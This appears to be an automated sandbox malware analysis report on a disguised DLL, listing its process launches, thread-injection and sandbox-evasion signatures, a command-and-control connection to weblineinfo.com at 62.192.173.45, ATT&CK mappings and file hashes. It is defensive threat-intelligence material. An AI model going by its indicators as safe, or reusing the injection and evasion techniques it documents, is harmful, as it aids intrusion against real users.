Source: C:\Windows\System32\rundll32.exe | Code functions (process 9, no named API calls): 9_2_000001B0A35C55C0, 9_2_000001B0A35B66C0, 9_2_000001B0A35D66E0, 9_2_000001B0A35CBED0, 9_2_000001B0A35D13A3, 9_2_000001B0A35E1F40, 9_2_000001B0A35BA730, 9_2_000001B0A35E2F60, 9_2_000001B0A35D7220, 9_2_000001B0A35E0210, 9_2_000001B0A35C4DB0, 9_2_000001B0A35DB5E0, 9_2_000001B0A35D55E0, 9_2_000001B0A35B99D0, 9_2_000001B0A35C16A0, 9_2_000001B0A35C42A0, 9_2_000001B0A35D82A0, 9_2_000001B0A35B9500, 9_2_000001B0A35CA100, 9_2_000001B0A35C9120, 9_2_000001B0A35CB4E0, 9_2_000001B0A35B5D60, 9_2_000001B0A35D4550, 9_2_000001B0A35E2812, 9_2_000001B0A35DFBC0, 9_2_000001B0A35D2BB0, 9_2_000001B0A35CCBE0, 9_2_000001B0A35E1490
Source: C:\Windows\System32\rundll32.exe | Code function: String function: 0000000180106AE4 appears 53 times
Source: C:\Windows\System32\rundll32.exe | Code function: String function: 0000000180107230 appears 65 times
Source: C:\Windows\System32\rundll32.exe | Code function: String function: 000000018003C440 appears 47 times
Source: C:\Windows\System32\rundll32.exe | Code function: String function: 0000000180005830 appears 51 times
Source: 10kmr9d7.dll | Binary or memory string: OriginalFilenameActionsShim.dll8 vs 10kmr9d7.dll
Source: 10kmr9d7.dll | Static PE information: Section: .rsrc ZLIB complexity 0.9947324810606061
Source: 10kmr9d7.dll | Binary string: ??\\?\\\.\LPTCOMCONPRNAUXNUL/ntdll.dllchineseczechnorwegianslovakidProcessUtilsD:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\ProcessUtils.cpp :\Device\Mup\\\Device\LanmanRedirector\\\\\.\GlobalrootOpenProcess call with pid [%d] failed with error [%d]. Cannot get the process path!mb::common::system::ProcessUtils::GetProcessPathGetProcessImageFileName for [%d] failed with error [%d]. Cannot get the process path!NtQuerySystemInformationSHA1MD5SHA256SHA384SHA512**** Error 0x%x returned by BCryptOpenAlgorithmProvider - HashMbCommonSigCRYPTUSRD:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\CryptoUser.cppMbHashMemoryObjectLength**** Error 0x%x returned by BCryptGetProperty getting object length**** memory allocation failedHashDigestLength**** Error 0x%x returned by BCryptGetProperty getting hash length**** Invalid hash size: %u, need %u**** Invalid hash buffer: %p**** Error 0x%x returned by BCryptCreateHash**** Error 0x%x returned by BCryptHashData**** Error 0x%x returned by BCryptFinishHashRSAPUBLICBLOBFailed to import the public key - %xImportRsaPublicKeyXRSA**** Error 0x%x returned by BCryptOpenAlgorithmProviderVerifyTrusted****> Failed to import public key - %xKaseya LimitedKaseya certificate is trusted!ConnectWise certificate is trusted!VerifyData**** Failed to import public key - %xVerify signature returns %xGetFileHash32Not A Valid Dos StubNot A Valid PE Executable**** Error getting memoryError calculating rest of data!!GetFileHash64
Source: classification engine | Classification label: mal56.evad.winDLL@56/0@1/1
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180008770 CreateToolhelp32Snapshot,GetLastError,Sleep,CreateToolhelp32Snapshot,Module32FirstW,CloseHandle,OpenProcess,GetLastError,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,LoadLibraryW,GetProcAddress,GetLastError,GetModuleHandleW,CloseHandle,VirtualQueryEx,CloseHandle,GetLastError,CloseHandle,CloseHandle,GetLastError,CloseHandle,6_2_0000000180008770
Source: C:\Windows\System32\rundll32.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6628:120:WilError_03
Source: 10kmr9d7.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll64.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\10kmr9d7.dll"
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",#1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_CancelAllOperations
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_Create
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_Destroy
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_CancelAllOperations
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Create
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Destroy
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetTxtReplaceData
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetRegValueReplaceData
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetRegValueDeleteData
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetBasicData
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_Delete
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ShutdownTargetDLL
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_SetMaxLogLevel
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_SetLogCallback
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessThreatActionsV2
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessThreatActions
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessPendingActionsAfterReboot
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_PrepareUpdate
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_IsDLLNewlyLoaded
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_InitTargetDLL
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetMinorAPIVersion
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetMajorAPIVersion
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetDetectedThreatsV2
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetDetectedThreats
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_FinishUpdate
Source: C:\Windows\System32\loaddll64.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll64.exe | Section loaded: version.dll
Source: C:\Windows\System32\loaddll64.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\loaddll64.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: 10kmr9d7.dll | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 10kmr9d7.dll | Static PE information: Image base 0x180000000 > 0x60000000
Source: 10kmr9d7.dll | Static file information: File size 2449408 > 1048576
Source: 10kmr9d7.dll | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x143800
Source: 10kmr9d7.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 10kmr9d7.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 10kmr9d7.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 10kmr9d7.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 10kmr9d7.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 10kmr9d7.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 10kmr9d7.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\JENKINS\workspace\N_CleanActions\bin\x64\Release\ActionsShim.pdb | source: rundll32.exe, 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.3272319252.0000000180154000.00000002.00000001.01000000.00000003.sdmp, 10kmr9d7.dll
Source: 10kmr9d7.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 10kmr9d7.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 10kmr9d7.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 10kmr9d7.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 10kmr9d7.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: 10kmr9d7.dll | Static PE information: real checksum: 0x227cd1 should be: 0x25c48f
Source: 10kmr9d7.dll | Static PE information: section name: _RDATA
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Code function: 9_2_000001B0A35D4D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo
Source: C:\Windows\System32\rundll32.exe | API coverage: 2.6 %
Source: C:\Windows\System32\loaddll64.exe TID: 1252 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800143C0 GetLogicalDriveStringsW,QueryDosDeviceW,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
Source: C:\Windows\System32\loaddll64.exe | Thread delayed: delay time: 120000
Source: rundll32.exe, 0000000D.00000002.2114413384.000002771D968000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt?jP
Source: rundll32.exe, 00000006.00000002.3273047761.000002357AD08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
Source: rundll32.exe, 00000009.00000003.2157253061.000001B0A1B26000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272959794.000001B0A1B21000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW}7
Source: rundll32.exe, 00000006.00000002.3273047761.000002357AD99000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272959794.000001B0A1AC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.2157253061.000001B0A1B26000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272959794.000001B0A1B21000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000006.00000002.3273047761.000002357AD99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 0000001A.00000002.2116556383.0000015FD8378000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvvU
Source: rundll32.exe, 00000004.00000002.2017147384.000001F832DF8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2110636588.000002697B658000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2112934934.000002177F5A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2110665237.000001A88B888000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2117187690.0000019E30E68000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000014.00000002.2117481002.0000023524F98000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2117589113.000001B655BD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.2116056288.000001855C971000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2117327755.00000208B6241000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001C.00000002.2116564892.000002698DBD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.2116190139.000002076DBA8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: loaddll64.exe, 00000000.00000002.2113990565.0000020B53D0D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ
Source: rundll32.exe, 00000003.00000002.2017068075.0000025F28EE7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllll
Source: rundll32.exe, 00000007.00000002.2077807792.000001F951EEF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2116391665.000002106E6B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluu
Source: rundll32.exe, 00000008.00000002.2111797184.00000208DCF88000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr
Source: rundll32.exe, 0000000E.00000002.2116700449.000001C4E0D91000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001B.00000002.2117323033.000001C7CF781000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<<
Source: rundll32.exe, 0000000F.00000002.2116577454.0000016CEFDF1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2117010439.00000210A1D41000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.2117398894.00000201FF071000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==
Source: rundll32.exe, 00000010.00000002.2116560361.00000236B7808000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt
Source: rundll32.exe, 00000019.00000002.2116239016.0000029E3E5C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllww
Source: C:\Windows\System32\rundll32.exe | Code function: 9_2_000001B0A35BCCE0 LdrGetProcedureAddress
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180107848 GetLastError,IsDebuggerPresent,OutputDebugStringW
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180115DC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180106F64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\System32\rundll32.exe | Code function: 9_2_000001B0A35C77E0 RtlAddVectoredExceptionHandler,RtlRemoveVectoredExceptionHandler

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe | Network Connect: 62.192.173.45 443
Source: C:\Windows\System32\rundll32.exe | Thread register set: target process: 5812
Source: C:\Windows\System32\rundll32.exe | Thread register set: target process: 5812
Source: C:\Windows\System32\rundll32.exe | Thread register set: target process: 3480
Source: C:\Windows\System32\rundll32.exe | Thread register set: target process: 3480
Source: C:\Windows\System32\rundll32.exe | Thread register set: 5812 1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",#1
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180130228 GetLocaleInfoW
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018012FDA8 EnumSystemLocalesW
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180107684 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Windows\System32\rundll32.exe | Code function: 9_2_000001B0A35D4D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo
MITRE ATT&CK Matrix (tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact)

Techniques highlighted for this sample, grouped by tactic, with the cell values exactly as rendered in the original matrix in parentheses:

  • Execution: Native API (1)
  • Persistence: DLL Side-Loading (1)
  • Privilege Escalation: Process Injection (311), DLL Side-Loading (1)
  • Defense Evasion: Virtualization/Sandbox Evasion (11), Process Injection (311), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (1), Rundll32 (1), Software Packing (1), DLL Side-Loading (1)
  • Discovery: System Time Discovery (1), Security Software Discovery (21), Virtualization/Sandbox Evasion (11), Process Discovery (1), Account Discovery (1), System Owner/User Discovery (1), System Network Configuration Discovery (1), File and Directory Discovery (1), System Information Discovery (12)
  • Collection: Archive Collected Data (11)
  • Command and Control: Encrypted Channel (21), Non-Application Layer Protocol (2), Application Layer Protocol (13)
  • Impact: Data Encrypted for Impact (1)

All other cells of the matrix (Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement and Exfiltration columns, and the unnumbered techniques in the remaining columns) are the generic ATT&CK technique grid with no hits for this sample.
Behavior Graph ID: 1490633 | Sample: 10kmr9d7.mp3 | Start date: 09/08/2024 | Architecture: WINDOWS | Score: 56
Graph contents: loaddll64.exe started two rundll32.exe instances, cmd.exe and 24 other processes; cmd.exe started a further rundll32.exe; rundll32.exe connected to weblineinfo.com (62.192.173.45, port 443, local ports 49704 and 49705; HUGESERVER-NETWORKSUS, Lithuania).
Signatures attached to the graph: Sets debug register (to hijack the execution of another thread); Modifies the context of a thread in another process (thread injection); System process connects to network (likely due to code injection or exploit).

No Antivirus matches
Source | Detection | Scanner | Label
https://weblineinfo.com/ | 0% | Avira URL Cloud | safe
https://weblineinfo.com/D | 0% | Avira URL Cloud | safe
https://weblineinfo.com/graphy | 0% | Avira URL Cloud | safe
https://weblineinfo.com/r | 0% | Avira URL Cloud | safe
https://weblineinfo.com/=cn | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
weblineinfo.com | 62.192.173.45 | true | true | (none) | unknown

    Name | Source | Malicious | Antivirus Detection | Reputation
    https://weblineinfo.com/graphy | rundll32.exe, 00000009.00000002.3272959794.000001B0A1B8A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://weblineinfo.com/r | rundll32.exe, 00000006.00000003.2376171753.000002357ADAD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://weblineinfo.com/D | rundll32.exe, 00000009.00000003.2157253061.000001B0A1B26000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272959794.000001B0A1B21000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://weblineinfo.com/ | rundll32.exe, 00000006.00000002.3273047761.000002357AD64000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2724309581.000002357ADAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3273047761.000002357ADAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.2157253061.000001B0A1B26000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272959794.000001B0A1B8A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272959794.000001B0A1B21000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://weblineinfo.com/=cn | rundll32.exe, 00000006.00000003.2724449942.000002357ADDB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3273047761.000002357ADDB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2724309581.000002357ADDB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    IP | Domain | Country | ASN | ASN Name | Malicious
    62.192.173.45 | weblineinfo.com | Lithuania | 25780 | HUGESERVER-NETWORKSUS | true
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1490633
    Start date and time:2024-08-09 16:16:15 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 6m 1s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of new started processes analysed:33
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:10kmr9d7.dll
    (renamed file extension from mp3 to dll)
    Original Sample Name:10kmr9d7.mp3
    Detection:MAL
    Classification:mal56.evad.winDLL@56/0@1/1
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 84%
    • Number of executed functions: 20
    • Number of non-executed functions: 66
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes were analyzed; report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    Time | Type | Description
    10:17:12 | API Interceptor | 1x Sleep call for process: loaddll64.exe modified
    No context
    Match: HUGESERVER-NETWORKSUS
    Associated Sample Name / URL | Detection | Threat Name | Context
    mirai.spc.elf | malicious | Mirai | 171.22.79.159
    ClientAny.exe | malicious | AsyncRAT, VenomRAT | 2.58.84.229
    https://denizfirsatgsmtektikbuo.xyz/ | malicious | HTMLPhisher | 2.58.85.5
    x86.elf | malicious | Mirai, Moobot | 107.161.53.91
    lKXAJFq3ih.exe | malicious | AsyncRAT | 2.58.85.145
    peign94sXb.elf | malicious | Unknown | 171.22.79.111
    jSlv5GLHad.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc | 185.133.35.50
    hajime-like-20231028-0250.elf | malicious | Gafgyt, Mirai | 62.192.173.7
    HDyd3HGFG9.elf | malicious | Mirai | 62.192.173.7
    qBY3LYayGE.elf | malicious | Mirai | 62.192.173.7
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    37f463bf4616ecd445d4a1937da06e19 | PDFixers (1).exe | malicious | Unknown | 62.192.173.45
    37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Vidar | 62.192.173.45
    37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Babuk, Djvu | 62.192.173.45
    37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Vidar | 62.192.173.45
    37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Vidar | 62.192.173.45
    37f463bf4616ecd445d4a1937da06e19 | Ordine 403012.docx.doc | malicious | Unknown | 62.192.173.45
    37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Trojan.Crypt.23519.13317.exe | malicious | Unknown | 62.192.173.45
    37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Trojan.Crypt.23519.13317.exe | malicious | Unknown | 62.192.173.45
    37f463bf4616ecd445d4a1937da06e19 | verify-captcha-987.b-cdn.net.ps1 | malicious | Clipboard Hijacker | 62.192.173.45
    37f463bf4616ecd445d4a1937da06e19 | verifyhuman476.b-cdn.net.ps1 | malicious | Clipboard Hijacker | 62.192.173.45
    No context
    No created / dropped files found
    File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Entropy (8bit): 6.748659647863066
    TrID:
    • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
    • Win64 Executable (generic) (12005/4) 10.17%
    • Generic Win/DOS Executable (2004/3) 1.70%
    • DOS Executable Generic (2002/1) 1.70%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
    File name: 10kmr9d7.dll
    File size: 2'449'408 bytes
    MD5: 7abbf9f2106c2dd1e69110c6c6b8dbc6
    SHA1: 05cf0a54c0e62d170b6ff9bb0108b70164a0e681
    SHA256: 44f5ebb4facaba45274f08437a1f980bbbdb209cbd016ead76e4ec1afaca4dc2
    SHA512: b577338b86d082f4f87e58342c54d5c2c80e17aa9bc983e558904aaaf8a23a6c780c5627e935c39bcabe63e3776310529f3066b06776a0f7869eff721a8bd3fd
    SSDEEP: 49152:tR3rKKPT0xXxBg7KNvBtFXTM6utS1vdPUGu5hOAxNMQwR:fLeFDMb8F2Gu/fzwR
    TLSH: 79B5AE17E3DA41F9DDB7C2388953C51BD7B2B8191370ABCF06A452681EA37E1127EB18
    File Content Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$............~...~...~.......~......z~...~...~.......~.......~.......~.......~.......|.......~...~..3........~.......~.......~....M..~.
    Icon Hash: 7ae282899bbab082
    Entrypoint: 0x180106e54
    Entrypoint Section: .text
    Digitally signed: false
    Imagebase: 0x180000000
    Subsystem: windows gui
    Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DLL
    DLL Characteristics: HIGH_ENTROPY_VA
    Time Stamp: 0x662BC869 [Fri Apr 26 15:29:45 2024 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major: 6
    OS Version Minor: 0
    File Version Major: 6
    File Version Minor: 0
    Subsystem Version Major: 6
    Subsystem Version Minor: 0
    Import Hash: 7654de49588e8164879719d356bd8735
    Instruction
    dec eax
    mov dword ptr [esp+08h], ebx
    dec eax
    mov dword ptr [esp+10h], esi
    push edi
    dec eax
    sub esp, 20h
    dec ecx
    mov edi, eax
    mov ebx, edx
    dec eax
    mov esi, ecx
    cmp edx, 01h
    jne 00007F8684E050F7h
    call 00007F8684E05904h
    dec esp
    mov eax, edi
    mov edx, ebx
    dec eax
    mov ecx, esi
    dec eax
    mov ebx, dword ptr [esp+30h]
    dec eax
    mov esi, dword ptr [esp+38h]
    dec eax
    add esp, 20h
    pop edi
    jmp 00007F8684E04F84h
    int3
    int3
    int3
    dec eax
